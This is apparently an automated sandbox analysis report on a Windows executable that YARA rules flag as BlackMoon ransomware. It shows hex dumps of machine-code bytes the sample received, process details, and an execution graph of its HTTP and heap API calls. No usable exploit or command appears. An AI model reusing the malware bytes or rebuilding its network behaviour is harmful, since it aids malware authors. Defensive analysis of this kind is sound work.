                                                              2025-01-02 08:28:30 UTC4096INData Raw: 01 00 83 c4 0c 89 45 c8 83 7d c8 00 0f 85 6c 00 00 00 89 65 d0 ff 75 f4 ff 15 00 c0 02 10 90 90 90 90 39 65 d0 74 17 68 92 03 00 00 68 88 66 01 04 68 06 00 00 00 e8 82 87 01 00 83 c4 0c 89 65 d0 68 00 00 00 00 ff 75 fc ff 15 08 c0 02 10 90 90 90 90 39 65 d0 74 17 68 ac 03 00 00 68 88 66 01 04 68 06 00 00 00 e8 51 87 01 00 83 c4 0c b8 a6 e2 02 10 e9 c9 03 00 00 e9 93 03 00 00 68 04 00 00 80 6a 00 68 c4 e2 02 10 68 01 00 00 00 bb 98 01 00 00 e8 36 a7 01 00 83 c4 10 89 45 d0 8b 45 d0 50 8b 5d e0 85 db 74 09 53 e8 01 87 01 00 83 c4 04 58 89 45 e0 db 45 10 dd 5d cc dd 45 cc dc 0d af e2 02 10 dd 5d c4 dd 45 c4 e8 a2 f8 ff ff 68 01 03 00 80 6a 00 50 68 01 00 00 00 bb bc 01 00 00 e8 07 aa 01 00 83 c4 10 89 45 c0 8b 45 c0 50 8b 5d dc 85 db 74 09 53 e8 b2 86 01 00
                                                              Data Ascii: E}leu9ethhfhehu9ethhfhQhjhh6EEP]tSXEE]E]EhjPhEEP]tS
                                                              2025-01-02 08:28:30 UTC4096INData Raw: 68 04 00 00 80 6a 00 68 8f e4 02 10 68 04 00 00 80 6a 00 68 76 e4 02 10 68 30 00 01 00 6a 00 ff 75 f8 68 04 00 00 00 bb 4c 09 00 00 e8 1e 90 01 00 83 c4 34 68 02 00 00 80 6a 00 68 00 00 00 00 6a 00 6a 00 6a 00 68 04 00 00 80 6a 00 68 96 e4 02 10 68 04 00 00 80 6a 00 8b 45 f4 85 c0 75 05 b8 a6 e2 02 10 50 68 04 00 00 00 bb 48 01 00 00 e8 da 9a 01 00 83 c4 34 89 45 d8 83 7d d8 ff 0f 85 8d 00 00 00 8d 45 f4 50 e8 6f 24 00 00 89 45 dc 8d 45 f4 50 e8 7b 25 00 00 89 45 d8 68 04 00 00 80 6a 00 8b 45 d8 85 c0 75 05 b8 a6 e2 02 10 50 68 04 00 00 80 6a 00 8b 45 dc 85 c0 75 05 b8 a6 e2 02 10 50 68 04 00 00 80 6a 00 68 76 e4 02 10 68 30 00 01 00 6a 00 ff 75 f8 68 04 00 00 00 bb 4c 09 00 00 e8 65 8f 01 00 83 c4 34 8b 5d dc 85 db 74 09 53 e8 b7 76 01 00 83 c4 04 8b 5d
                                                              Data Ascii: hjhhjhvh0juhL4hjhjjjhjhhjEuPhH4E}EPo$EEP{%EhjEuPhjEuPhjhvh0juhLe4]tSv]
                                                              2025-01-02 08:28:30 UTC4096INData Raw: 00 e8 b7 67 01 00 83 c4 0c c1 e0 02 03 d8 89 5d d4 db 45 f4 dd 5d cc dd 45 cc dc 25 b7 e2 02 10 dd 5d c4 dd 45 c4 e8 48 d9 ff ff 68 01 03 00 80 6a 00 50 68 01 03 00 80 6a 00 68 01 00 00 00 68 04 00 00 80 6a 00 8b 5d d4 8b 03 85 c0 75 05 b8 a6 e2 02 10 50 68 03 00 00 00 bb 3c 01 00 00 e8 1b 89 01 00 83 c4 28 89 45 c0 8b 45 c0 50 8b 5d f0 85 db 74 09 53 e8 36 67 01 00 83 c4 04 58 89 45 f0 68 02 00 00 80 6a 00 68 00 00 00 00 6a 00 6a 00 6a 00 68 04 00 00 80 6a 00 68 08 e5 02 10 68 04 00 00 80 6a 00 8b 45 f0 85 c0 75 05 b8 a6 e2 02 10 50 68 04 00 00 00 bb 48 01 00 00 e8 8c 8a 01 00 83 c4 34 89 45 d0 83 7d d0 ff 0f 84 48 02 00 00 b8 a6 e2 02 10 50 8b 5d ec 85 db 74 09 53 e8 cb 66 01 00 83 c4 04 58 89 45 ec 6a 00 6a 00 6a 00 68 04 00 00 80 6a 00 68 08 e5 02 10
                                                              Data Ascii: g]E]E%]EHhjPhjhhj]uPh<(EEP]tS6gXEhjhjjjhjhhjEuPhH4E}HP]tSfXEjjjhjh
                                                              2025-01-02 08:28:30 UTC4096INData Raw: c6 ff ff b8 01 00 00 00 3b c1 7c 17 68 58 05 00 00 68 68 66 01 04 68 01 00 00 00 e8 9d 57 01 00 83 c4 0c 03 d8 89 5d c8 68 01 03 00 80 6a 00 68 0f 00 00 00 8b 5d c8 8a 03 25 ff 00 00 00 68 01 03 00 80 6a 00 50 68 02 00 00 00 bb c4 00 00 00 e8 da 7a 01 00 83 c4 1c 89 45 c4 68 01 03 00 80 6a 00 68 02 00 00 00 68 01 03 00 80 6a 00 ff 75 c4 68 02 00 00 00 bb f8 09 00 00 e8 0f 8b 01 00 83 c4 1c 89 45 c0 8b 5d e0 e8 7c c5 ff ff b8 02 00 00 00 3b c1 7c 17 68 8b 05 00 00 68 68 66 01 04 68 01 00 00 00 e8 12 57 01 00 83 c4 0c 03 d8 89 5d bc 68 01 03 00 80 6a 00 68 06 00 00 00 8b 5d bc 8a 03 25 ff 00 00 00 68 01 03 00 80 6a 00 50 68 02 00 00 00 bb fc 09 00 00 e8 3f 7a 01 00 83 c4 1c 89 45 b8 db 45 c0 dd 5d b0 dd 45 b0 db 45 b8 dd 5d a8 dc 45 a8 dc 05 b7 e2 02 10 dd
                                                              Data Ascii: ;|hXhhfhW]hjh]%hjPhzEhjhhjuhE]|;|hhhfhW]hjh]%hjPh?zEE]EE]E
                                                              2025-01-02 08:28:30 UTC4096INData Raw: 04 68 04 00 00 00 e8 b2 47 01 00 83 c4 0c 59 5b 3b c1 7c 17 68 f5 02 00 00 68 88 68 01 04 68 01 00 00 00 e8 95 47 01 00 83 c4 0c c1 e0 02 03 d8 89 5d f0 ff 75 f0 e8 27 04 00 00 89 45 ec 8d 45 ec 50 8d 45 f8 50 e8 67 05 00 00 89 45 e8 8b 5d ec 85 db 74 09 53 e8 56 47 01 00 83 c4 04 83 7d e8 00 0f 85 d7 00 00 00 8b 5d fc e8 9a b5 ff ff 53 51 8b 45 f4 48 79 17 68 1c 03 00 00 68 88 68 01 04 68 04 00 00 00 e8 31 47 01 00 83 c4 0c 59 5b 3b c1 7c 17 68 1c 03 00 00 68 88 68 01 04 68 01 00 00 00 e8 14 47 01 00 83 c4 0c c1 e0 02 03 d8 89 5d f0 8d 45 f8 50 6a 04 b8 02 00 00 00 e8 8b 4b 01 00 83 c4 08 8b 5d f0 8b 03 89 45 ec 8b 5d f8 89 5d e8 e8 30 b5 ff ff 89 4d e4 8b 7d e8 c7 07 01 00 00 00 83 c7 04 8b c1 40 89 07 83 c7 04 3b fb 74 04 8b f3 f3 a5 8b 45 e4 40 c1 e0
                                                              Data Ascii: hGY[;|hhhhG]u'EEPEPgE]tSVG}]SQEHyhhhh1GY[;|hhhhG]EPjK]E]]0M}@;tE@
                                                              2025-01-02 08:28:30 UTC4096INData Raw: 04 00 55 8b ec 81 ec 28 00 00 00 c7 45 fc 00 00 00 00 c7 45 f8 00 00 00 00 c7 45 f4 00 00 00 00 c7 45 f0 00 00 00 00 68 86 e5 02 10 8b 5d 08 ff 33 b9 02 00 00 00 e8 ef a5 ff ff 83 c4 08 89 45 ec 8b 45 ec 50 8b 5d fc 85 db 74 09 53 e8 5f 37 01 00 83 c4 04 58 89 45 fc 8d 45 fc 50 e8 84 01 00 00 89 45 f8 83 7d f8 00 0f 84 43 00 00 00 89 65 e8 ff 75 f8 ff 15 eb 03 03 10 90 90 90 90 83 c4 04 39 65 e8 74 17 68 cc 00 00 00 68 61 66 01 04 68 06 00 00 00 e8 22 37 01 00 83 c4 0c 89 45 e0 83 7d e0 00 0f 8e 07 00 00 00 b8 01 00 00 00 eb 05 b8 00 00 00 00 85 c0 0f 84 e0 00 00 00 89 65 ec 68 00 00 00 00 68 00 00 00 00 68 ff ff ff ff ff 75 f8 68 00 00 00 00 ff 75 0c ff 15 9c c0 02 10 90 90 90 90 39 65 ec 74 17 68 0b 01 00 00 68 61 66 01 04 68 06 00 00 00 e8 be 36 01 00
                                                              Data Ascii: U(EEEEh]3EEP]tS_7XEEPE}Ceu9ethhafh"7E}ehhhuhu9ethhafh6
                                                              2025-01-02 08:28:30 UTC4096INData Raw: bb 34 01 00 00 e8 c5 5a 01 00 83 c4 1c 89 45 a4 8b 45 a4 50 8b 5d e8 85 db 74 09 53 e8 90 27 01 00 83 c4 04 58 89 45 e8 c7 45 b4 00 00 00 00 6a 00 ff 75 b4 c7 45 b0 00 00 00 00 6a 00 ff 75 b0 b8 df e5 02 10 89 45 ac 8d 45 ac 50 8d 45 f0 50 e8 1c 64 00 00 89 45 a8 8b 5d ac 85 db 74 09 53 e8 4c 27 01 00 83 c4 04 8b 45 a8 50 8b 5d f0 85 db 74 09 53 e8 38 27 01 00 83 c4 04 58 89 45 f0 68 a6 e2 02 10 ff 75 f0 e8 fd a3 ff ff 83 c4 08 83 f8 00 0f 84 16 0f 00 00 c7 45 b4 00 00 00 00 6a 00 ff 75 b4 c7 45 b0 00 00 00 00 6a 00 ff 75 b0 b8 6d e5 02 10 89 45 ac 8d 45 ac 50 b8 ea e5 02 10 89 45 a8 8d 45 a8 50 8d 45 f0 50 e8 c6 47 00 00 89 45 a4 8b 5d a8 85 db 74 09 53 e8 cf 26 01 00 83 c4 04 8b 5d ac 85 db 74 09 53 e8 bf 26 01 00 83 c4 04 8b 45 a4 50 8b 5d f0 85 db 74
                                                              Data Ascii: 4ZEEP]tS'XEEjuEjuEEPEPdE]tSL'EP]tS8'XEhuEjuEjumEEPEEPEPGE]tS&]tS&EP]t
                                                              2025-01-02 08:28:30 UTC4096INData Raw: e8 ac 17 01 00 83 c4 04 8b 5d e8 85 db 74 09 53 e8 9c 17 01 00 83 c4 04 8b 5d e4 85 db 74 09 53 e8 8c 17 01 00 83 c4 04 8b 5d e0 85 db 74 09 53 e8 7c 17 01 00 83 c4 04 8b 5d dc 85 db 74 09 53 e8 6c 17 01 00 83 c4 04 8b 5d d8 85 db 74 09 53 e8 5c 17 01 00 83 c4 04 8b 5d d4 85 db 74 09 53 e8 4c 17 01 00 83 c4 04 8b 5d d0 85 db 74 09 53 e8 3c 17 01 00 83 c4 04 8b 5d cc 85 db 74 09 53 e8 2c 17 01 00 83 c4 04 8b 5d c8 85 db 74 09 53 e8 1c 17 01 00 83 c4 04 8b 5d c4 85 db 74 09 53 e8 0c 17 01 00 83 c4 04 8b 5d c0 53 8b 03 ff 10 e8 fc 16 01 00 83 c4 04 8b 5d bc 85 db 74 09 53 e8 ec 16 01 00 83 c4 04 8b 5d b8 85 db 74 09 53 e8 dc 16 01 00 83 c4 04 58 8b e5 5d c2 08 00 55 8b ec 81 ec 40 00 00 00 c7 45 fc 00 00 00 00 68 0c 00 00 00 e8 b2 16 01 00 83 c4 04 89 45 f8
                                                              Data Ascii: ]tS]tS]tS|]tSl]tS\]tSL]tS<]tS,]tS]tS]S]tS]tSX]U@EhE


                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              System Behavior

                                                              General

                                                              Target ID:0
                                                              Start time:03:28:25
                                                              Start date:02/01/2025
                                                              Path:C:\Users\user\Desktop\1734098836319.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\1734098836319.exe"
                                                              Imagebase:0x400000
                                                              File size:547'840 bytes
                                                              MD5 hash:B2524709C9B62C107EAA1235DB37CBDB
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 00000000.00000002.2953729868.000000000331E000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 00000000.00000003.1746204629.0000000003274000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 00000000.00000003.1742800871.0000000003241000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:low
                                                              Has exited:false

                                                              Disassembly

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:3.3%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:31.1%
                                                                Total number of Nodes:1233
                                                                Total number of Limit Nodes:29
                                                                execution_graph 113976 404c60 113977 404c65 113976->113977 114058 42b880 113977->114058 113979 404cb1 114063 42b970 113979->114063 113981 404cda 114007 404e77 113981->114007 114123 406c14 113981->114123 113983 404f78 113985 404f82 113983->113985 113986 404ff8 113983->113986 113984 404ecc 114068 42bb90 113984->114068 113993 404f96 InternetOpenA 113985->113993 113989 405002 InternetOpenA 113986->113989 113990 40504a 113986->113990 113988 404dd1 114131 42bb00 GetProcessHeap RtlAllocateHeap MessageBoxA 113988->114131 113997 404f33 113989->113997 113994 40505e InternetOpenA 113990->113994 113991 404ee7 113992 42bb90 3 API calls 113991->113992 113995 404f08 InternetOpenA 113992->113995 113993->113997 113994->113997 113995->113997 114009 4050c5 113997->114009 114073 406ff8 113997->114073 113999 4050fb 114095 4079a2 113999->114095 114001 404e27 114001->114007 114132 406eb2 GetProcessHeap RtlAllocateHeap MessageBoxA 114001->114132 114002 405106 114003 42bb90 3 API calls 114002->114003 114005 405124 114003->114005 114006 42bb90 3 API calls 114005->114006 114008 405145 InternetConnectA 114006->114008 114007->113983 114007->113984 114010 40517b 114008->114010 114011 4051d5 InternetCloseHandle 114010->114011 114012 40520b 114010->114012 114011->114009 114105 407be2 114012->114105 114014 40531f 114015 42bb90 3 API calls 114014->114015 114016 40533d 114015->114016 114017 42bb90 3 API calls 114016->114017 114018 40535e HttpOpenRequestA 114017->114018 114019 405392 114018->114019 114020 4053ec InternetCloseHandle 114019->114020 114021 40544e InternetSetOptionA 114019->114021 114022 405401 114020->114022 114023 405418 InternetCloseHandle 114020->114023 114032 405479 114021->114032 114022->114023 114023->114009 114024 4057c7 114025 4057d5 114024->114025 114026 4057ea HttpSendRequestA 114025->114026 114028 405815 114026->114028 114027 405831 114034 405899 114027->114034 114133 42b4e0 114027->114133 114029 40593b 114028->114029 114108 42b8f0 114029->114108 114032->114024 114032->114027 114033 4059a8 InternetReadFile 114037 405974 114033->114037 114035 405914 HttpSendRequestA 114034->114035 114035->114029 114037->114033 114038 405a4d 114037->114038 114113 42bbb0 114037->114113 114118 42bbe0 114038->114118 114040 405a68 114041 405a84 HttpQueryInfoA 114040->114041 114042 405ad1 InternetCloseHandle 114041->114042 114043 405aba 114041->114043 114044 405ae6 114042->114044 114045 405afd InternetCloseHandle 114042->114045 114043->114042 114044->114045 114046 405b12 114045->114046 114047 405b29 InternetCloseHandle 114045->114047 114046->114047 114048 405b3e 114047->114048 114146 42a430 114048->114146 114050 405fcf 114051 42b880 3 API calls 114050->114051 114052 406044 114051->114052 114052->114009 114185 40803b 52 API calls 114052->114185 114054 406c14 32 API calls 114056 405b8c 114054->114056 114056->114050 114056->114054 114057 42bb00 GetProcessHeap RtlAllocateHeap MessageBoxA 114056->114057 114161 42bc10 114056->114161 114057->114056 114060 42b88c 114058->114060 114059 42b8c4 114059->113979 114060->114059 114186 429e40 114060->114186 114062 42b8ad 114062->113979 114064 42b97c 114063->114064 114065 42b985 114064->114065 114066 429e40 3 API calls 114064->114066 114065->113981 114067 42b991 114066->114067 114067->113981 114069 42bb99 114068->114069 114070 42bb9d 114068->114070 114069->113991 114071 429e40 3 API calls 114070->114071 114072 42bba4 114071->114072 114072->113991 114074 407012 114073->114074 114075 42b970 3 API calls 114074->114075 114076 40706b 114075->114076 114077 40749d 114076->114077 114081 407093 114076->114081 114078 42bc10 32 API calls 114077->114078 114079 4074ee 114078->114079 114082 42bc10 32 API calls 114079->114082 114080 42b880 3 API calls 114083 40715f 114080->114083 114081->114080 114086 40755d 114082->114086 114084 40719d 114083->114084 114088 407216 114083->114088 114085 406c14 32 API calls 114084->114085 114091 4071d6 114085->114091 114089 42b880 3 API calls 114086->114089 114094 40734a 114086->114094 114087 406c14 32 API calls 114087->114091 114088->114087 114089->114094 114090 42a430 32 API calls 114090->114094 114091->114090 114091->114094 114092 407855 114092->113999 114093 42b880 3 API calls 114093->114092 114094->114092 114094->114093 114096 406ff8 32 API calls 114095->114096 114097 4079e0 114096->114097 114098 407b09 114097->114098 114102 407a4c 114097->114102 114099 42b970 3 API calls 114098->114099 114100 407b2e 114099->114100 114101 42b880 3 API calls 114100->114101 114104 407ae6 114101->114104 114191 42c090 114102->114191 114104->114002 114106 406ff8 32 API calls 114105->114106 114107 407c2c 114106->114107 114107->114014 114109 42b8f9 114108->114109 114110 42b8fd 114108->114110 114109->114037 114275 429df0 114110->114275 114112 42b906 114112->114037 114114 42bbdb 114113->114114 114115 42bbb8 114113->114115 114114->114037 114115->114114 114280 430ef0 GetProcessHeap RtlAllocateHeap MessageBoxA 114115->114280 114117 42bbd7 114117->114037 114119 42bbe9 114118->114119 114120 42bbed 114118->114120 114119->114040 114121 429e40 3 API calls 114120->114121 114122 42bbf7 114121->114122 114122->114040 114124 406c4f 114123->114124 114125 42bc10 32 API calls 114124->114125 114126 406c8c 114125->114126 114127 42bc10 32 API calls 114126->114127 114129 406cfd 114127->114129 114128 406e72 114128->113988 114129->114128 114281 42a0b0 GetProcessHeap RtlAllocateHeap MessageBoxA 114129->114281 114131->114001 114132->114007 114134 42b4ff 114133->114134 114136 42b50b 114134->114136 114137 42b53e 114134->114137 114135 42b5a2 114135->114034 114282 430ef0 GetProcessHeap RtlAllocateHeap MessageBoxA 114136->114282 114137->114135 114139 42b559 114137->114139 114140 42b57a 114137->114140 114283 430ef0 GetProcessHeap RtlAllocateHeap MessageBoxA 114139->114283 114284 430ef0 GetProcessHeap RtlAllocateHeap MessageBoxA 114140->114284 114141 42b535 114141->114034 114144 42b571 114144->114034 114145 42b599 114145->114034 114148 42a441 114146->114148 114147 42a578 114147->114056 114148->114147 114149 4dc45e _rand 24 API calls 114148->114149 114150 42a4a1 114149->114150 114150->114147 114152 42a4f5 114150->114152 114285 430a00 29 API calls 114150->114285 114151 42a516 114153 429e40 3 API calls 114151->114153 114152->114151 114286 430a00 29 API calls 114152->114286 114156 42a52d 114153->114156 114157 42a55d 114156->114157 114287 4309c0 GetProcessHeap RtlAllocateHeap MessageBoxA 114156->114287 114159 42a56b 114157->114159 114160 4dc375 _rand 24 API calls 114157->114160 114159->114056 114160->114159 114162 42be4f 114161->114162 114163 42bc23 114161->114163 114162->114056 114163->114162 114164 42bc5d 114163->114164 114171 42bc71 114163->114171 114288 4309c0 GetProcessHeap RtlAllocateHeap MessageBoxA 114164->114288 114166 42bc66 114166->114056 114167 42bcfc 114289 4309c0 GetProcessHeap RtlAllocateHeap MessageBoxA 114167->114289 114169 42bd03 114169->114056 114170 4dc45e _rand 24 API calls 114172 42bcef 114170->114172 114171->114167 114171->114170 114172->114167 114173 42bd0e 114172->114173 114175 42bd82 114173->114175 114178 42bd31 114173->114178 114174 42bd80 114176 42bde6 114174->114176 114290 430a00 29 API calls 114174->114290 114175->114174 114181 430a00 29 API calls 114175->114181 114180 429e40 3 API calls 114176->114180 114177 430a00 29 API calls 114177->114178 114178->114174 114178->114177 114184 42bdf4 114180->114184 114181->114175 114182 42be42 114182->114056 114183 4dc375 _rand 24 API calls 114183->114182 114184->114182 114184->114183 114185->114009 114187 429e54 RtlAllocateHeap 114186->114187 114188 429e49 GetProcessHeap 114186->114188 114189 429e82 114187->114189 114190 429e69 MessageBoxA 114187->114190 114188->114187 114189->114062 114190->114189 114192 42c0a3 114191->114192 114193 42c10a __ftol 114191->114193 114192->114193 114201 431410 114192->114201 114193->114104 114195 42c0e4 114196 42c103 114195->114196 114214 4dc63c 6 API calls 114195->114214 114196->114104 114198 42c0f3 114215 429f00 114198->114215 114203 43141b 114201->114203 114202 431422 114202->114195 114203->114202 114220 4dc45e 114203->114220 114205 43146f 114206 43147a LCMapStringA 114205->114206 114207 431499 114206->114207 114209 4314a3 114206->114209 114223 4dc375 114207->114223 114240 4309c0 GetProcessHeap RtlAllocateHeap MessageBoxA 114209->114240 114211 4314b3 114212 4dc375 _rand 24 API calls 114211->114212 114213 4314bb 114212->114213 114213->114195 114214->114198 114216 429f46 114215->114216 114217 429f0d 114215->114217 114216->114104 114217->114216 114218 429f2b IsBadReadPtr 114217->114218 114218->114216 114219 429f38 RtlFreeHeap 114218->114219 114219->114216 114241 4dc470 114220->114241 114224 4dc44f 114223->114224 114225 4dc3a3 114223->114225 114224->114209 114226 4dc3ad 114225->114226 114227 4dc3e8 114225->114227 114269 4e06db 24 API calls _rand 114226->114269 114228 4dc3d9 114227->114228 114272 4e06db 24 API calls _rand 114227->114272 114228->114224 114230 4dc441 HeapFree 114228->114230 114230->114224 114232 4dc3b4 _rand 114233 4dc3ce 114232->114233 114270 4df511 VirtualFree VirtualFree HeapFree _rand 114232->114270 114271 4dc3df RtlLeaveCriticalSection _rand 114233->114271 114236 4dc3f4 _rand 114239 4dc420 114236->114239 114273 4e0298 VirtualFree HeapFree VirtualFree _rand 114236->114273 114274 4dc437 RtlLeaveCriticalSection _rand 114239->114274 114240->114211 114243 4dc46d 114241->114243 114244 4dc477 _rand 114241->114244 114243->114205 114244->114243 114245 4dc49c 114244->114245 114246 4dc4c9 114245->114246 114250 4dc50c 114245->114250 114252 4dc4f7 114246->114252 114263 4e06db 24 API calls _rand 114246->114263 114248 4dc4df 114264 4df83a 5 API calls _rand 114248->114264 114249 4dc57b RtlAllocateHeap 114260 4dc4fe 114249->114260 114250->114252 114253 4dc52e 114250->114253 114252->114249 114252->114260 114266 4e06db 24 API calls _rand 114253->114266 114254 4dc4ea 114265 4dc503 RtlLeaveCriticalSection _rand 114254->114265 114257 4dc535 114267 4e02dd VirtualAlloc _rand 114257->114267 114259 4dc548 114268 4dc562 RtlLeaveCriticalSection _rand 114259->114268 114260->114244 114262 4dc555 114262->114252 114262->114260 114263->114248 114264->114254 114265->114252 114266->114257 114267->114259 114268->114262 114269->114232 114270->114233 114271->114228 114272->114236 114273->114239 114274->114228 114276 429e04 RtlAllocateHeap 114275->114276 114277 429df9 GetProcessHeap 114275->114277 114278 429e32 114276->114278 114279 429e19 MessageBoxA 114276->114279 114277->114276 114278->114112 114279->114278 114280->114117 114281->114128 114282->114141 114283->114144 114284->114145 114285->114150 114286->114151 114287->114156 114288->114166 114289->114169 114290->114176 114291 462834 114292 462a4a 114291->114292 114299 46284e 114291->114299 114293 462a54 114292->114293 114294 462cea 114292->114294 114297 462fa1 13 API calls 114293->114297 114295 462cf4 114294->114295 114296 462e05 114294->114296 114435 47ba0f CreateThread WaitForSingleObject CloseHandle 114295->114435 114301 462ef7 114296->114301 114302 462e0f 114296->114302 114300 462a59 114297->114300 114334 462929 114299->114334 114371 462fa1 114299->114371 114311 462a87 114300->114311 114312 462afe 114300->114312 114310 463adb 8 API calls 114301->114310 114339 4629ea 114301->114339 114303 462fa1 13 API calls 114302->114303 114307 462e14 114303->114307 114306 462d05 114309 462fa1 13 API calls 114306->114309 114318 4cb3e0 9 API calls 114307->114318 114307->114339 114308 46289c 114313 4628ff 114308->114313 114314 4628a9 114308->114314 114315 462d0a 114309->114315 114323 462f06 114310->114323 114422 442748 7 API calls 114311->114422 114319 4cb3e0 9 API calls 114312->114319 114387 4cb3e0 114313->114387 114419 463942 7 API calls 114314->114419 114324 4cb3e0 9 API calls 114315->114324 114365 462b9e 114315->114365 114343 462e55 114318->114343 114330 462b1e 114319->114330 114320 462aa2 114423 442748 7 API calls 114320->114423 114321 4628ae 114420 442748 7 API calls 114321->114420 114333 4d17b9 192 API calls 114323->114333 114323->114339 114350 462d5b 114324->114350 114326 4628bf 114421 442748 7 API calls 114326->114421 114328 462ac3 114424 463942 7 API calls 114328->114424 114329 462986 114329->114339 114409 4d17b9 114329->114409 114335 462b54 114330->114335 114333->114339 114400 463adb 114334->114400 114336 462b67 114335->114336 114337 462b8d 114335->114337 114426 442748 7 API calls 114336->114426 114427 442748 7 API calls 114337->114427 114342 462ad8 114425 442748 7 API calls 114342->114425 114343->114339 114344 462ec7 114343->114344 114437 442748 7 API calls 114344->114437 114345 462b78 114352 462fa1 13 API calls 114345->114352 114348 462ae9 114348->114312 114349 4628e0 114349->114313 114350->114365 114436 442748 7 API calls 114350->114436 114354 462bbd 114352->114354 114353 462c6e 114355 462fa1 13 API calls 114353->114355 114354->114353 114428 442748 7 API calls 114354->114428 114357 462c83 114355->114357 114359 462c90 114357->114359 114360 462cbb 114357->114360 114358 462bfc 114429 442748 7 API calls 114358->114429 114433 442748 7 API calls 114359->114433 114360->114365 114434 47b908 CoUninitialize ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 114360->114434 114363 462c1d 114430 47b76f 7 API calls 114363->114430 114365->114339 114367 462c32 114431 442748 7 API calls 114367->114431 114369 462c4d 114432 442748 7 API calls 114369->114432 114372 462fbb 114371->114372 114373 463047 114372->114373 114442 463720 lstrcpynW 114372->114442 114375 4cb3e0 9 API calls 114373->114375 114376 463067 114375->114376 114438 4637f5 lstrcpynW 114376->114438 114378 46307c 114440 463884 lstrcpyn 114378->114440 114380 4631a9 114381 463884 lstrcpyn 114380->114381 114382 4631e8 114381->114382 114386 46352f 114382->114386 114443 4ca2b0 114382->114443 114384 4cb3e0 9 API calls 114384->114386 114385 46354a 114385->114384 114385->114386 114386->114308 114388 4cb3ff 114387->114388 114390 4cb468 114387->114390 114389 4cb664 114388->114389 114452 4cb370 CoUninitialize ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 114388->114452 114389->114334 114390->114389 114392 4cb4e9 114390->114392 114393 4cb507 114390->114393 114398 4cb48e 114390->114398 114453 4cb370 CoUninitialize ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 114392->114453 114454 4d0cf0 __ftol __ftol __ftol __ftol 114393->114454 114394 4cb459 114394->114334 114397 4cb4f8 114397->114334 114398->114389 114455 4ca190 CoUninitialize ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 114398->114455 114456 4caef0 114400->114456 114402 463b0d 114461 463c33 114402->114461 114404 463b30 114405 463b3d GetModuleFileNameA 114404->114405 114408 463b8e 114404->114408 114406 463b5a 114405->114406 114407 463b79 PathFindFileNameA 114406->114407 114406->114408 114407->114408 114408->114329 114410 4d17d5 114409->114410 114414 4d17cc 114409->114414 114410->114414 114418 4d17fd 114410->114418 114478 4d16e0 114410->114478 114413 4d1809 114415 4d181d 114413->114415 114416 4d16e0 67 API calls 114413->114416 114413->114418 114414->114418 114466 4c9f90 114414->114466 114417 4d16e0 67 API calls 114415->114417 114415->114418 114416->114415 114417->114418 114418->114339 114419->114321 114420->114326 114421->114349 114422->114320 114423->114328 114424->114342 114425->114348 114426->114345 114427->114365 114428->114358 114429->114363 114430->114367 114431->114369 114432->114353 114433->114365 114434->114365 114435->114306 114436->114365 114437->114365 114439 46381f 114438->114439 114439->114378 114441 4638aa 114440->114441 114441->114380 114442->114373 114444 4ca2c1 114443->114444 114447 4ca2c6 114443->114447 114450 4ca030 GetModuleHandleA 114444->114450 114446 4ca324 114446->114385 114447->114446 114447->114447 114451 4ca190 CoUninitialize ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 114447->114451 114449 4ca309 114449->114385 114450->114447 114451->114449 114452->114394 114453->114397 114454->114398 114455->114389 114457 4caefd 114456->114457 114458 4caef9 114456->114458 114465 4ca190 CoUninitialize ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 114457->114465 114458->114402 114460 4caf08 114460->114402 114462 463c46 114461->114462 114463 463cf7 VirtualQuery 114462->114463 114464 463d67 114463->114464 114464->114404 114465->114460 114467 4c9fca 114466->114467 114468 4c9fa1 114466->114468 114513 4ca000 CoUninitialize 114467->114513 114469 4c9fcf 114468->114469 114471 4c9fa4 114468->114471 114472 47f5d8 14 API calls 114469->114472 114507 4d0300 114471->114507 114473 4c9fdb 114472->114473 114473->114413 114479 4d16ed GetVersion 114478->114479 114480 4d1775 114478->114480 114961 4d3c1e HeapCreate 114479->114961 114482 4d177b 114480->114482 114483 4d17a7 114480->114483 114485 4d1740 114482->114485 114487 4d1796 114482->114487 114976 4d31f5 22 API calls 114482->114976 114483->114485 114980 4d33c1 21 API calls _rand 114483->114980 114484 4d16ff 114484->114485 114970 4d32d5 27 API calls _rand 114484->114970 114485->114414 114977 4d361d 20 API calls _rand 114487->114977 114491 4d1737 114493 4d173b 114491->114493 114494 4d1744 GetCommandLineA 114491->114494 114492 4d179b 114978 4d3329 25 API calls 114492->114978 114971 4d3c7b 6 API calls 114493->114971 114972 4d3977 27 API calls _rand 114494->114972 114498 4d17a0 114979 4d3c7b 6 API calls 114498->114979 114499 4d1754 114973 4d3461 24 API calls _rand 114499->114973 114502 4d175e 114974 4d372a 20 API calls _rand 114502->114974 114504 4d1763 114975 4d3671 19 API calls _rand 114504->114975 114506 4d1768 114506->114485 114514 4c95a4 114507->114514 114510 47f5d8 114955 47f559 114510->114955 114512 47f5f1 114512->114413 114527 4c958e 114514->114527 114516 4c95ac 114530 439a29 114516->114530 114518 4c95cf 114533 454585 114518->114533 114520 4c95e8 114559 47e392 HeapCreate 114520->114559 114522 4c95f2 114561 